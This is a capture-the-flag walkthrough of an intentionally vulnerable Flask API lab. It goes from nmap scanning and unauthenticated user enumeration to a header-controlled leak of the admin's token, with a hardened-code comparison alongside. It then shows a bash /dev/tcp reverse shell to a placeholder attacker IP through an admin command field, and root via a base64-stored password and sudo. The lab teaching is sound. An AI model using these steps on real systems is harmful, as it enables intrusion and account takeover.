Vulnerable API App
Target Details
Target IP: 10.10.149.135
Service Discovery
Scan Open ports using nmap
```text
$ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
Nmap scan report for 10.10.149.135
Host is up (0.45s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
|   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
|_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.18.0 (Ubuntu)
5000/tcp open  upnp?
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.1 400 Bad Request
...
...
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   354.40 ms 10.2.0.1
2   ...
3
4   447.88 ms 10.10.149.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
Services Found:

| Service     | Port | Version       |
|-------------|------|---------------|
| SSH         | 22   | OpenSSH 8.2p1 |
| nginx HTTP  | 80   | 1.18.0        |
| Web Service | 5000 | Unknown       |
Answer the Task questions
Content Discovery
Visit the web application in the browser.
Common API endpoints are /api or api.domain.com; here /api worked!
We can find other endpoints by manually crawling through the web application with the Burp Suite proxy running.
On inspecting the HTML, the admin has left a message for the hacker in a web page comment:

```html
<!-- This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API! If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint! - vuln admin -->
```

From the comment we can conclude that we cannot sign up directly from the login page; we need to find the API endpoint to sign up. The admin has also hinted at the endpoint used for user sign up (`users`).
On visiting the /api/users endpoint, we get a JSON response providing information about other users!!

```json
{
  "users": [
    { "userid": 1, "first_name": "Martin", "last_name": "Rodriguez", "admin": false },
    { "userid": 2, "first_name": "Kristen", "last_name": "Martin", "admin": false },
    ....
    { "userid": 27, "first_name": "Derek", "last_name": "Washington", "admin": true }
  ]
}
```

Without any authentication we got user details: names, user ids and each user's role in the application.
In most cases an endpoint supports several HTTP methods; let's verify this using the OPTIONS method. Visit the same users endpoint, send the request to Repeater this time, and change the HTTP method from GET to OPTIONS:

```http
GET /api/users HTTP/1.1     # change to:  OPTIONS /api/users HTTP/1.1
```
On visiting the dmdhrumilmistry GitHub profile repos, the Vulnerable-API-App app.py file lists all the endpoints. The useful ones for now are listed below.

Endpoints discovered using Burp Suite:

| Endpoint    | Allowed methods               |
|-------------|-------------------------------|
| /api/users/ | DELETE, HEAD, OPTIONS, GET    |
| /api/users  | POST, OPTIONS, HEAD, GET      |
Exploit Endpoints
From the /api/user/<userid:int> endpoint we can get a single user's details, and from the /api/users endpoint we can retrieve the admin's user id and try to get their account details. In my case the admin id is 27 (the admin id will vary).
Send a Burp request to /api/user/27; we receive the JSON response:

```json
{ "admin": true, "first_name": "Derek", "last_name": "Washington", "userid": 27 }
```
Using the first question's hint, we know that we need to send the Hide-Info header in the HTTP request.

Burp Request:

```http
GET /api/user/27 HTTP/1.1
Hide-Info: 0
```

Burp JSON Response:

```json
{ "admin": true, "email": "admin@vuln-api-app.com", "first_name": "Derek", "last_name": "Washington", "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw", "userid": 27 }
```

A client-controlled header (Hide-Info) decides how much of the record the server returns, and the record itself contains a live session token, so anyone who can reach the endpoint can obtain the admin's token without a password.
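The following is an added example, not code from the Vulnerable-API-App project: it models the Hide-Info exposure seen above as a response serializer and places it beside a hardened version where the server chooses the fields from the authenticated caller's identity and never serialises the token. The user record, email and caller ids are constructed for the example.

```python
"""Added example: client-controlled field exposure vs. a server-side allow-list."""
from typing import Dict, Optional

# Constructed sample record; the real app's storage and values are not shown here.
USERS = {
    27: {
        "userid": 27, "first_name": "Derek", "last_name": "Washington",
        "admin": True, "email": "admin@example.invalid",
        "token": "<session-token-placeholder>",
    },
}

PUBLIC_FIELDS = ("userid", "first_name", "last_name", "admin")
OWNER_FIELDS = PUBLIC_FIELDS + ("email",)


def vulnerable_user_view(userid: int, headers: Dict[str, str]) -> Optional[dict]:
    """Vulnerable pattern: the response shape is chosen by a request header.

    The default hides the sensitive fields, but the client can flip the
    switch, so the 'protection' is only a suggestion.
    """
    user = USERS.get(userid)
    if user is None:
        return None
    if headers.get("Hide-Info", "1") == "0":
        return dict(user)                      # leaks email and token to anyone
    return {k: user[k] for k in PUBLIC_FIELDS}


def hardened_user_view(userid: int, caller: Optional[int]) -> Optional[dict]:
    """Hardened: an explicit allow-list keyed on who is asking.

    `caller` is the user id the framework established from a validated
    session or JWT (assumed to exist; it is not derived from any header the
    client can set). Only the owner sees their email; the token is never a
    response field, because a token is a credential, not profile data.
    """
    user = USERS.get(userid)
    if user is None:
        return None
    fields = OWNER_FIELDS if caller == userid else PUBLIC_FIELDS
    return {k: user[k] for k in fields}
```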
Now we've received the admin's token.
We can add the token to every request in Burp Suite using the Add Custom Header extension (refer to its docs for installation and usage), then configure the extension with the authorization token.

Now add http://10.10.149.135:5000 to the target scope and capture in-scope requests only. Configure the Custom Header extension to add the header while using the proxy:

1. Go to Project Options > Sessions.
2. Under Session Handling Rules, click Add.
3. Provide a description.
4. Under Rule Actions, click Add and choose Invoke Burp Extension.
5. Set the extension handler to Add Custom Header and click OK.
6. From the Scope tab, tick the Proxy checkbox so headers are added while using the proxy, and set the URL scope to Use Suite Scope.
7. Click OK.

Visit the home page: http://10.10.149.135:5000
Get Target Machine Shell
Visit the home page with the admin auth token applied.
From the home page, visit the Admin Controls tab, from where we can run bash commands.
Using the GTFOBins bash reverse shell, get a reverse shell.

Start netcat on the attacker's machine:

```shell
nc -nlvp 4444
```

Enter the command below in the command input field:

```shell
bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'
```

On execution of the command, we get a reverse shell on the attacker machine:

```text
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
bash: cannot set terminal process group (610): Inappropriate ioctl for device
bash: no job control in this shell
vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$
```
Get User Flag
Read the user flag:

```text
vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
THM{REDACTED}
```
Privilege Escalation
Check whether vulnadmin has sudo permissions:

```text
vulnadmin@vulnapiapp:~$ groups
sudo adm cdrom dip plugdev lxd
```

vulnadmin is in the sudo group, but first we need to find its password to run sudo commands. On listing the files in vulnadmin's home directory, we find a backup.txt file:

```text
vulnadmin@vulnapiapp:~$ ls -l
total 12
-rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
-rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt
```

On reading the file, its content appears to be base64 encoded. Decode backup.txt:

```text
vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d
{REDACTED}
```

It's the password for the vulnadmin account. To run sudo we need an interactive terminal first. Since the deployed application runs on Flask, a Python framework, Python must be installed, which we can verify:

```text
vulnadmin@vulnapiapp:~$ python3 --version
Python 3.8.10
```
Get Interactive Shell
```text
vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Switch to root with sudo using the recovered vulnadmin password:

```text
vulnadmin@vulnapiapp:~$ sudo su
[sudo] password for vulnadmin: {REDACTED}
root@vulnapiapp:/home/vulnadmin/#
```
Get Root Flag
```text
root@vulnapiapp:~# cat /root/root.txt
cat /root/root.txt
THM{REDACTED}
```
We've successfully Rooted the machine!!